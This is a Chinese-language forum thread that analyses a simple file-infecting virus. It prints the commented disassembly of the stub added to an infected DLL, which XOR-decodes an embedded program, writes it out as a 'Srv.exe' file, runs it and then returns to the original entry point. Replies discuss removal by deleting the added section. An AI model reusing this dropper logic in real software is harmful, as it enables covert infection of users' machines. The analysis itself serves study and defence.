某个简单的病毒的分析
本帖最后由 F8LEFT 于 2014-10-7 16:42 编辑大家好我是F8,菜鸟一个,求朋友一同研究技术。
最近得到了一个简单的病毒,所以就顺手研究了一下,实际上没有多大的技术含量,大家将就着看吧。
当然,我只看了被它感染后的文件的操作而已,代码非常的简洁,连个跳转都没有,所以挺好分析的。哈哈
废话不多说了,下面正式开始吧。
---------------------伪分割线---------------------------------------------分割--------------------------------------线--------------------------
10011000 >60 PUSHAD ; 保存寄存器
10011001 E8 00000000 CALL PhysXDev.10011006 ; --> call下一行
10011006 5D POP EBP ; 取得当前相对地址 10011006
10011007 8BC5 MOV EAX, EBP ; 用eax来保存地址
10011009 81ED 326F0120 SUB EBP, 0x20016F32
1001100F 2B85 50720120 SUB EAX, DWORD PTR SS: ;eax -= = = 6 = ModuleEntryPoint
10011015 8985 4C720120 MOV DWORD PTR SS:, EAX ; 写入入口点 : =
1001101B B0 00 MOV AL, 0x0
1001101D 8685 9E740120 XCHG BYTE PTR SS:, AL ; 取出 flag: = --> al,
10011023 3C 01 CMP AL, 0x1 ; 判断恶意代码是否需要执行
10011025 0F85 DE020000 JNZ <PhysXDev.End> ; 下面的均是用来定位模块的相对数据的,当前ebp = 10011006 - 20016F32,再加上一个相近的数,实际上是相对地址10011006加上一个偏移。这样就算模块不是加载在10000000也可以定位数据
1001102B 8B85 4C720120 MOV EAX, DWORD PTR SS: ; 取回模块入口点,ModuleEntryPoint
10011031 2B85 58720120 SUB EAX, DWORD PTR SS: ; 计算得到LoadLibraryA地址,这里的API地址是原来dll就拥有的
10011037 8B00 MOV EAX, DWORD PTR DS: ; 取出地址LoadLibraryA
10011039 8985 EA730120 MOV DWORD PTR SS:, EAX ; 写入到壳的IAT表中, = Addr: LoadLibraryA
1001103F 8B85 4C720120 MOV EAX, DWORD PTR SS: ; 取ModuleEntryPoint
10011045 2B85 5C720120 SUB EAX, DWORD PTR SS: ; 取原dll的API: GetProcAddress
1001104B 8B00 MOV EAX, DWORD PTR DS:
1001104D 8985 F2730120 MOV DWORD PTR SS:, EAX ; 写入到壳的IAT表中: = GetProcAddress
10011053 83BD F2730120 0>CMP DWORD PTR SS:, 0x0
1001105A 0F84 A9020000 JE <PhysXDev.End>
10011060 83BD EA730120 0>CMP DWORD PTR SS:, 0x0
10011067 0F84 9C020000 JE <PhysXDev.End> ; 检查前面取的API地址是否有效,下面开始装载壳需要的API
1001106D 8D85 8D740120 LEA EAX, DWORD PTR SS:
10011073 50 PUSH EAX ; str:"kernel32.dll"
10011074 FF95 EA730120 CALL NEAR DWORD PTR SS: ; --> LoadLibraryA "kernel32.dll"
1001107A 83F8 00 CMP EAX, 0x0 ; --> 检查是否成功加载dll
1001107D 0F84 86020000 JE <PhysXDev.End>
10011083 8985 E6730120 MOV DWORD PTR SS:, EAX ; --> 写入dll基地址(hDll)
10011089 8D85 16740120 LEA EAX, DWORD PTR SS:
1001108F 50 PUSH EAX ; Str:"FreeLibrary"
10011090 FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
10011096 FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "FreeLibrary")
1001109C 83F8 00 CMP EAX, 0x0
1001109F 0F84 58020000 JE <PhysXDev.End2>
100110A5 8985 EE730120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = FreeLibrary
100110AB 8D85 22740120 LEA EAX, DWORD PTR SS:
100110B1 50 PUSH EAX ; str:"CreateMutexA"
100110B2 FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
100110B8 FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "CreateMutexA")
100110BE 83F8 00 CMP EAX, 0x0
100110C1 0F84 36020000 JE <PhysXDev.End2>
100110C7 8985 F6730120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = CreateMutexA
100110CD 8D85 3B740120 LEA EAX, DWORD PTR SS:
100110D3 50 PUSH EAX ; str:"ReleaseMutex"
100110D4 FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
100110DA FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "ReleaseMutex")
100110E0 83F8 00 CMP EAX, 0x0
100110E3 0F84 14020000 JE <PhysXDev.End2>
100110E9 8985 FE730120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = ReleaseMutex
100110EF 8D85 2F740120 LEA EAX, DWORD PTR SS:
100110F5 50 PUSH EAX ; str:"CloseHandle"
100110F6 FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
100110FC FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "CloseHandle")
10011102 83F8 00 CMP EAX, 0x0
10011105 0F84 F2010000 JE <PhysXDev.End2>
1001110B 8985 FA730120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = CloseHandle
10011111 8D85 48740120 LEA EAX, DWORD PTR SS:
10011117 50 PUSH EAX ; str:"GetLastError"
10011118 FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
1001111E FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "GetLastError")
10011124 83F8 00 CMP EAX, 0x0
10011127 0F84 D0010000 JE <PhysXDev.End2>
1001112D 8985 02740120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = GetLastError
10011133 8D85 55740120 LEA EAX, DWORD PTR SS:
10011139 50 PUSH EAX ; str:"CreateFileA"
1001113A FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
10011140 FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "CreateFileA")
10011146 83F8 00 CMP EAX, 0x0
10011149 0F84 AE010000 JE <PhysXDev.End2>
1001114F 8985 06740120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = CreateFileA
10011155 8D85 61740120 LEA EAX, DWORD PTR SS:
1001115B 50 PUSH EAX ; str:"WriteFile"
1001115C FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
10011162 FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "WriteFile")
10011168 83F8 00 CMP EAX, 0x0
1001116B 0F84 8C010000 JE <PhysXDev.End2>
10011171 8985 0A740120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = WriteFile
10011177 8D85 6B740120 LEA EAX, DWORD PTR SS:
1001117D 50 PUSH EAX ; str:"GetModuleFileNameA"
1001117E FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
10011184 FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "GetModuleFileNameA")
1001118A 83F8 00 CMP EAX, 0x0
1001118D 0F84 6A010000 JE <PhysXDev.End2>
10011193 8985 0E740120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = GetModuleFileNameA
10011199 8D85 7E740120 LEA EAX, DWORD PTR SS:
1001119F 50 PUSH EAX ; str:"CreateProcessA"
100111A0 FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
100111A6 FF95 F2730120 CALL NEAR DWORD PTR SS: ; --> GetProcAddress (hDll, "CreateProcessA")
100111AC 83F8 00 CMP EAX, 0x0
100111AF 0F84 48010000 JE <PhysXDev.End2>
100111B5 8985 12740120 MOV DWORD PTR SS:, EAX ; 写入IAT表 = CreateProcessA
100111BB 8D85 78720120 LEA EAX, DWORD PTR SS: ; --------------------------------------------->
100111C1 50 PUSH EAX ; str:"KyUffThOkYwRRtgPP"
100111C2 6A 01 PUSH 0x1
100111C4 6A 00 PUSH 0x0
100111C6 FF95 F6730120 CALL NEAR DWORD PTR SS: ; CreateMutexA(0, 1, "KyUffThOkYwRRtgPP")
100111CC 50 PUSH EAX
100111CD FF95 02740120 CALL NEAR DWORD PTR SS: ; GetLastError
100111D3 5B POP EBX
100111D4 50 PUSH EAX
100111D5 53 PUSH EBX
100111D6 53 PUSH EBX
100111D7 FF95 FE730120 CALL NEAR DWORD PTR SS: ; ReleaseMutex
100111DD FF95 FA730120 CALL NEAR DWORD PTR SS: ; CloseHandle
100111E3 58 POP EAX
100111E4 3D B7000000 CMP EAX, 0xB7 ; 检查病毒进程是否已经存在
100111E9 0F84 0E010000 JE <PhysXDev.End2> ; <--------------------------------------------------
100111EF 8B8D 9A740120 MOV ECX, DWORD PTR SS: ;取病毒原程序长度
100111F5 8DBD 9E740120 LEA EDI, DWORD PTR SS: ; 取病毒原程序位置(被加密)
100111FB 47 INC EDI
100111FC BA 00000000 MOV EDX, 0x0
10011201 0BD2 OR EDX, EDX
10011203 75 07 JNZ SHORT PhysXDev.1001120C
10011205 8B95 60720120 MOV EDX, DWORD PTR SS: ; 取解码key长度
1001120B 4A DEC EDX
1001120C 8A9C2A 64720120 MOV BL, BYTE PTR DS: ; 取对应的解码key
10011213 321F XOR BL, BYTE PTR DS: ; 病毒程序 xor key = 还原程序
10011215 881F MOV BYTE PTR DS:, BL ; 写回原来的程序代码
10011217 47 INC EDI
10011218 4A DEC EDX
10011219^ E2 E6 LOOPD SHORT PhysXDev.10011201 ; 循环解码,就只是简单的 xor 而已
1001121B 68 FF000000 PUSH 0xFF
10011220 8D85 92720120 LEA EAX, DWORD PTR SS: ;buffer for Name
10011226 50 PUSH EAX
10011227 6A 00 PUSH 0x0
10011229 FF95 0E740120 CALL NEAR DWORD PTR SS: ;GetModuleFileNameA(0, szName, 0xFF)
1001122F 8BC8 MOV ECX, EAX ; 保存长度
10011231 8D9D 92720120 LEA EBX, DWORD PTR SS: ; 取得当前程序名-> 将转换为地址
10011237 03C3 ADD EAX, EBX ; 定位到最后一个字符
10011239 FD STD
1001123A 8BF8 MOV EDI, EAX
1001123C B0 2E MOV AL, 0x2E ;ASCII"."
1001123E F2:AE REPNE SCAS BYTE PTR ES: ; 从后面开始进行扫描,扫到.为止
10011240 47 INC EDI
10011241 FC CLD
10011242 8DB5 8A720120 LEA ESI, DWORD PTR SS: ; str "Srv.exe"
10011248 B9 08000000 MOV ECX, 0x8
1001124D F3:A4 REP MOVS BYTE PTR ES:, BYTE PTR DS:[ES>; 进行字符窜的拼接
1001124F 6A 00 PUSH 0x0 ; 如,原来为 E:\LoadDll.exe 变为 E:\LoadDllSrv.exe
10011251 68 80000000 PUSH 0x80
10011256 6A 02 PUSH 0x2
10011258 6A 00 PUSH 0x0
1001125A 6A 02 PUSH 0x2
1001125C 68 00000040 PUSH 0x40000000
10011261 8D85 92720120 LEA EAX, DWORD PTR SS:
10011267 50 PUSH EAX
10011268 FF95 06740120 CALL NEAR DWORD PTR SS: ; CreateFileA(Name, 0x40000....,创建病毒文件
1001126E 83F8 FF CMP EAX, -0x1
10011271 0F84 86000000 JE <PhysXDev.End2>
10011277 50 PUSH EAX
10011278 8BD0 MOV EDX, EAX
1001127A 6A 00 PUSH 0x0
1001127C 8D85 48720120 LEA EAX, DWORD PTR SS:
10011282 50 PUSH EAX
10011283 FFB5 9A740120 PUSH DWORD PTR SS:
10011289 8D9D 9E740120 LEA EBX, DWORD PTR SS:
1001128F 43 INC EBX
10011290 53 PUSH EBX
10011291 52 PUSH EDX
10011292 FF95 0A740120 CALL NEAR DWORD PTR SS: ; WriteFile(...........写病毒文件
10011298 FF95 FA730120 CALL NEAR DWORD PTR SS: ; CloseHandle
1001129E FC CLD
1001129F B9 44000000 MOV ECX, 0x44
100112A4 8DBD 92730120 LEA EDI, DWORD PTR SS:
100112AA B0 00 MOV AL, 0x0
100112AC F3:AA REP STOS BYTE PTR ES:
100112AE B9 10000000 MOV ECX, 0x10
100112B3 8DBD D6730120 LEA EDI, DWORD PTR SS:
100112B9 B0 00 MOV AL, 0x0
100112BB F3:AA REP STOS BYTE PTR ES:
100112BD 8D85 D6730120 LEA EAX, DWORD PTR SS:
100112C3 50 PUSH EAX
100112C4 8D85 92730120 LEA EAX, DWORD PTR SS:
100112CA 50 PUSH EAX
100112CB 6A 00 PUSH 0x0
100112CD 6A 00 PUSH 0x0
100112CF 6A 00 PUSH 0x0
100112D1 6A 00 PUSH 0x0
100112D3 6A 00 PUSH 0x0
100112D5 6A 00 PUSH 0x0
100112D7 8D85 92720120 LEA EAX, DWORD PTR SS:
100112DD 50 PUSH EAX
100112DE 6A 00 PUSH 0x0
100112E0 FF95 12740120 CALL NEAR DWORD PTR SS: ; CreateProcessA(。。。。运行刚才写入的病毒文件
100112E6 8DBD D6730120 LEA EDI, DWORD PTR SS:
100112EC FF37 PUSH DWORD PTR DS:
100112EE FF77 04 PUSH DWORD PTR DS:
100112F1 FF95 FA730120 CALL NEAR DWORD PTR SS: ; CloseHandle(进程)
100112F7 FF95 FA730120 CALL NEAR DWORD PTR SS: ; CloseHandle(线程)
100112FD >FFB5 E6730120 PUSH DWORD PTR SS: ; hDll
10011303 FF95 EE730120 CALL NEAR DWORD PTR SS: ; FreeLibrary (kernel32.dll)
10011309 >8B85 4C720120 MOV EAX, DWORD PTR SS:
1001130F 2B85 54720120 SUB EAX, DWORD PTR SS:
10011315 894424 1C MOV DWORD PTR SS:, EAX
10011319 61 POPAD ; 得到原来的dll入口点
1001131A- FFE0 JMP NEAR EAX ; PhysXDev.10002A1F
请注意,附件的dll是一个病毒来的,请不要随便打开!!!!不看说明导致中毒的,还请不要怪我。。。
附件解压密码:123
小菜不懂,不敢下载打开额,呵呵 分析完后 如何 对付呢??? 膜拜会病毒分析的。。 heizihui 发表于 2014-10-7 20:00
分析完后 如何 对付呢???
学一下病毒的技术以及思想比较重要,关于对付来说倒是挺简单的。
这个病毒主要是添加区段,并没有修改源文件的代码。你也可以看到,到最后,还是得跳回去原来的入口点执行的。所以如果想要杀毒的话,可以删掉添加的区段,然后把入口点修复一下就OK了。连文件都不用删。。。
太强悍了,膜拜 F8大侠,分析病毒。好羡慕,什么时候才有这功力啊 不错,复制到记事上看,这显示的代码大难看了 膜拜啊~~ 学习了,能否也把生成的病毒程序分析下...
页:
[1]
2